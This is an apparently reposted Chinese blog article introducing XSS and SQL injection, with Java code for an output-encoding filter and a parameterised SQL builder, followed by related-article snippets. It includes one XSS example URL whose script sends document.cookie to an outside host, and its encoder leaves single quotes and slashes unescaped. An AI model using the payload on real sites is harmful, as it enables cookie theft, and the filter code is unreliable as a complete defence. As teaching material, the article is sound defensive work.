对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见。

对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门参考大量前辈们的心得,小小的总结一下,欢迎大家拍砖啊

一、跨站脚本攻击(XSS)

跨站脚本攻击的原理

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。

跨站脚本攻击的危害:窃取cookie、放蠕虫、网站钓鱼 ...

跨站脚本攻击的分类主要有:存储型XSS、反射型XSS、DOM型XSS

XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么就存在XSS漏洞。这个利用XSS漏洞的病毒之所以具有重要意义是因为,通常难以看到XSS漏洞的威胁,而该病毒则将其发挥得淋漓尽致。

XSS工作流程

1)恶意用户,在一些公共区域(例如,建议提交表单或消息公共板的输入表单)输入一些文本,这些文本被其它用户看到,但这些文本不仅仅是他们要输入的文本,同时还包括一些可以在客户端执行的脚本。如:
http://xxx.xxx.com.cn/intf/_photos.jsp?callback=<script>window.location.href="http://www.baidu.com?a=" + escape(document.cookie)</script>、参数<script>xxx< /script>如果这里没有经过转义处理,则页面中就嵌入了一段script
2)恶意提交这个表单
3)其他用户看到这个包括恶意脚本的页面并执行,获取用户的cookie等敏感信息。

如下情况,请求跳转到百度,并将查询到的cookie值也显示出来了

结果将导致:

更详细的Xss原理等知识请参考园内大拿“小坦克”的这篇文章 Web安全测试之XSS

那我们要如何防御Xss?

一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码

import java.net.URLEncoder;

/**

 * 过滤非法字符工具类

 *

 */

public class EncodeFilter {

    //过滤大部分html字符

    public static String encode(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            switch (ch) {

                case '&': sb.append("&amp;");

                    break;

                case '<': sb.append("&lt;");

                    break;

                case '>': sb.append("&gt;");

                    break;

                case '"': sb.append("&quot;");

                    break;

                case '\'': sb.append("'");

                    break;

                case '/': sb.append("/");

                    break;

                default: sb.append(ch);

            }

        }

        return sb.toString();

    }

    //js端过滤

    public static String encodeForJS(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            // do not encode alphanumeric characters and ',' '.' '_'

            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                    ch >= '0' && ch <= '9' ||

                    ch == ',' || ch == '.' || ch == '_') {

                sb.append(ch);

            } else {

                String temp = Integer.toHexString(ch);

                // encode up to 256 with \\xHH

                if (ch < 256) {

                    sb.append('\\').append('x');

                    if (temp.length() == 1) {

                        sb.append('0');

                    }

                    sb.append(temp.toLowerCase());

                // otherwise encode with \\uHHHH

                } else {

                    sb.append('\\').append('u');

                    for (int j = 0, d = 4 - temp.length(); j < d; j ++) {

                        sb.append('0');

                    }

                    sb.append(temp.toUpperCase());

                }

            }

        }

        return sb.toString();

    }

    /**

     * css非法字符过滤

     * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters    */

    public static String encodeForCSS(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            // check for alphanumeric characters

            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                    ch >= '0' && ch <= '9') {

                sb.append(ch);

            } else {

                // return the hex and end in whitespace to terminate

                sb.append('\\').append(Integer.toHexString(ch)).append(' ');

            }

        }

        return sb.toString();

    }

    /**

     * URL参数编码

     * http://en.wikipedia.org/wiki/Percent-encoding     */

    public static String encodeURIComponent(String input) {

        return encodeURIComponent(input, "utf-8");

    }

    public static String encodeURIComponent(String input, String encoding) {

        if (input == null) {

            return input;

        }

        String result;

        try {

            result = URLEncoder.encode(input, encoding);

        } catch (Exception e) {

            result = "";

        }

        return result;

    }

    public static boolean isValidURL(String input) {

        if (input == null || input.length() < 8) {

            return false;

        }

        char ch0 = input.charAt(0);

        if (ch0 == 'h') {

            if (input.charAt(1) == 't' &&

                input.charAt(2) == 't' &&

                input.charAt(3) == 'p') {

                char ch4 = input.charAt(4);

                if (ch4 == ':') {

                    if (input.charAt(5) == '/' &&

                        input.charAt(6) == '/') {

                        return isValidURLChar(input, 7);

                    } else {

                        return false;

                    }

                } else if (ch4 == 's') {

                    if (input.charAt(5) == ':' &&

                        input.charAt(6) == '/' &&

                        input.charAt(7) == '/') {

                        return isValidURLChar(input, 8);

                    } else {

                        return false;

                    }

                } else {

                    return false;

                }

            } else {

                return false;

            }

        } else if (ch0 == 'f') {

            if( input.charAt(1) == 't' &&

                input.charAt(2) == 'p' &&

                input.charAt(3) == ':' &&

                input.charAt(4) == '/' &&

                input.charAt(5) == '/') {

                return isValidURLChar(input, 6);

            } else {

                return false;

            }

        }

        return false;

    }

    static boolean isValidURLChar(String url, int start) {

        for (int i = start, c = url.length(); i < c; i ++) {

            char ch = url.charAt(i);

            if (ch == '"' || ch == '\'') {

                return false;

            }

        }

        return true;

    }

}

乌云网有很多关于xss报错的bug记录,如http://www.wooyun.org/bugs/wooyun-2010-016779

SQL注入漏洞

SQL注入攻击的原理:

使用用户输入的参数拼凑SQL查询语句,使用户可以控制SQL查询语句。详细关于sql注入的信息请参考:SQL注入攻防入门详解

防御方法

  • 使用预编译语句,
  • 绑定变量
  • 使用安全的存储过程
  • 检查数据类型
  • 使用安全函数

建议方法:不要使用拼接的sql,使用占位符,例如使用JdbcTemplate,

下面给出一种解决方法:用下面的各种函数代替拼接sql的出现

import java.util.ArrayList;

import java.util.HashMap;

import java.util.List;

import java.util.Map;

public class SqlBuilder {

    protected StringBuilder sqlBuf = new StringBuilder();

    protected List<Object> values = new ArrayList<Object>();

    protected Map<String, Object> paramMap = new HashMap<String, Object>();

    public SqlBuilder appendSql(String sql) {

        sqlBuf.append(sql);

        return this;

    }

    public SqlBuilder appendValue(Object value) {

        sqlBuf.append('?');

        values.add(value);

        return this;

    }

    public SqlBuilder appendValues(Object[] values) {

        sqlBuf.append('(');

        for (int i = 0, c = values.length; i < c; ++i) {

            sqlBuf.append('?').append(',');

            this.values.add(values[i]);

        }

        int last = sqlBuf.length() - 1;

        if (last > 0 && sqlBuf.charAt(last) == ',') {

            sqlBuf.setCharAt(last, ')');

        }

        return this;

    }

    public SqlBuilder appendEqParam(String param, Object value) {

        sqlBuf.append(param).append(" = :").append(param);

        paramMap.put(param, value);

        return this;

    }

    public SqlBuilder appendLtParam(String param, Object value) {

        sqlBuf.append(param).append(" < :").append(param);

        paramMap.put(param, value);

        return this;

    }

    public SqlBuilder appendGtParam(String param, Object value) {

        sqlBuf.append(param).append(" > :").append(param);

        paramMap.put(param, value);

        return this;

    }

    public SqlBuilder appendInParam(String param, Object ... values) {

        if(values == null) {

            return this;

        }

        sqlBuf.append(param).append(" in (");

        int len = values.length;

        for(int i = 0; i < len; i++) {

            if(i != 0) {

                sqlBuf.append(", ");

            }

            sqlBuf.append(":").append(param).append(i);

            paramMap.put(param+i, values[i]);

        }

        sqlBuf.append(")");

        return this;

    }

    public SqlBuilder appendLikeParam(String param, Object value) {

        sqlBuf.append(param).append(" like :").append(param);

        paramMap.put(param, "%"+value+"%");

        return this;

    }

    public String getSql() {

        return sqlBuf.toString();

    }

    public Object[] getValues() {

        return values.toArray();

    }

    public Map<String, Object> getParamMap() {

        return paramMap;

    }

}

上面的两种漏洞对于web开发会经常遇到,此外还有拒绝服务攻击漏洞、跨站请求伪造(CSRF)、开放重定向漏洞等等,以后再慢慢学习!!!

转自:链接

WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案(转)的更多相关文章

  1. Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。

    Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...

  2. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  3. 简单分析什么是SQL注入漏洞

    现在很多人在入侵的过程中基本都是通过SQL注入来完成的,但是有多少人知道为什么会有这样的注入漏洞呢?有的会随口说着对于字符的过滤不严造成的.但是事实是这样吗?我们学这些,不仅要知其然,更要知其所以然! ...

  4. 什么是简单的分析SQL注入漏洞

    如今非常多人在入侵的过程中基本都是通过SQL注入来完毕的,可是有多少人知道为什么会有这种注入漏洞呢?有的会随口说着对于字符的过滤不严造成的. 可是事实是这样吗?我们学这些.不仅要知其然.更要知其所以然 ...

  5. web应用程序安全攻防---sql注入和xss跨站脚本攻击

    kali视频学习请看 http://www.cnblogs.com/lidong20179210/p/8909569.html 博文主要内容包括两种常见的web攻击 sql注入 XSS跨站脚本攻击 代 ...

  6. 10年前,我就用 SQL注入漏洞黑了学校网站

    我是风筝,公众号「古时的风筝」,一个兼具深度与广度的程序员鼓励师,一个本打算写诗却写起了代码的田园码农! 文章会收录在 JavaNewBee 中,更有 Java 后端知识图谱,从小白到大牛要走的路都在 ...

  7. 利用SQL注入漏洞登录后台的实现方法

    利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...

  8. 预处理prepareStatement是怎么防止sql注入漏洞的?

    序,目前在对数据库进行操作之前,使用prepareStatement预编译,然后再根据通配符进行数据填值,是比较常见的做法,好处是提高执行效率,而且保证排除SQL注入漏洞. 一.prepareStat ...

  9. zabbix再爆高危SQL注入漏洞,可获系统权限

    漏洞概述 zabbix是一个开源的企业级性能监控解决方案.近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 ...

随机推荐

  1. Windows下LATEX排版论文攻略—CTeX、JabRef使用介绍

    Windows下LATEX排版论文攻略—CTeX.JabRef使用介绍 一.工具介绍 TeX是一个很好排版工具,在学术界十分流行,特别是数学.物理学和计算机科学界. CTeX是TeX中的一个版本,指的 ...

  2. Python之路3【第一篇】Python基础

    本节内容 Python简介 Python安装 第一个Python程序 编程语言的分类 Python简介 1.Python的由来 python的创始人为吉多·范罗苏姆(Guido van Rossum) ...

  3. 转:入门Webpack,看这篇就够了

    写在前面的话 阅读本文之前,先看下面这个webpack的配置文件,如果每一项你都懂,那本文能带给你的收获也许就比较有限,你可以快速浏览或直接跳过:如果你和十天前的我一样,对很多选项存在着疑惑,那花一段 ...

  4. 转载:Centos7 从零编译配置Memcached

    序言 Memcached 是一个高性能的分布式内存对象缓存系统,用于动态Web应用以减轻数据库负载.它通过在内存中缓存数据和对象来减少读取数据库的次数,从而提高动态.数据库驱动网站的速度. Memca ...

  5. SQL Server中查询数据库及表的信息语句

    /* -- 本文件主要是汇总了 Microsoft SQL Server 中有关数据库与表的相关信息查询语句. -- 下面的查询语句中一般给出两种查询方法, -- A方法访问系统表,适应于SQL 20 ...

  6. cacti汇总流量图-将数据合并后作图

    在使用Cacti方便快捷的建立监控图时,往往根据实际应用必须监控几台甚至上百台服务器的汇总流量图来观察该应用服务器组的总流量等指标. 这里我们就来介绍如何用cacit快速的建立汇总流量图,其他汇总图建 ...

  7. 自动化运维 Expect

      Mac 下载:brew install homebrew/dupes/expect expect : ->  自动化脚本工具:  用于处理交互命令; #注意 调用时并不是使用的 /bin/b ...

  8. 【转】实现ViewPager懒加载的三种方法

    方法一 在Fragment可见时请求数据.此方案仍预加载了前后的页面,但是没有请求数据,只有进入到当前Framgent时才请求数据. 优点:实现了数据的懒加载缺点:一次仍是三个Framgment对象, ...

  9. linux无法挂载u盘

    一般插入u盘都会自动挂载,但有时挂载不了,错误提示:can't find /dev/sdb in /etc/fstab:这时可能是U盘坏了,我们当然不希望是这样.也有可能是U盘使用的接口不对应导致系统 ...

  10. struts2笔记

    Struts2 中, HTML 表单将被直接映射到一个 POJO,通过params拦截器,类中定义对应属性,及对应set方法即可. Struts2 中,任何一个POJO都可以是一个action类. S ...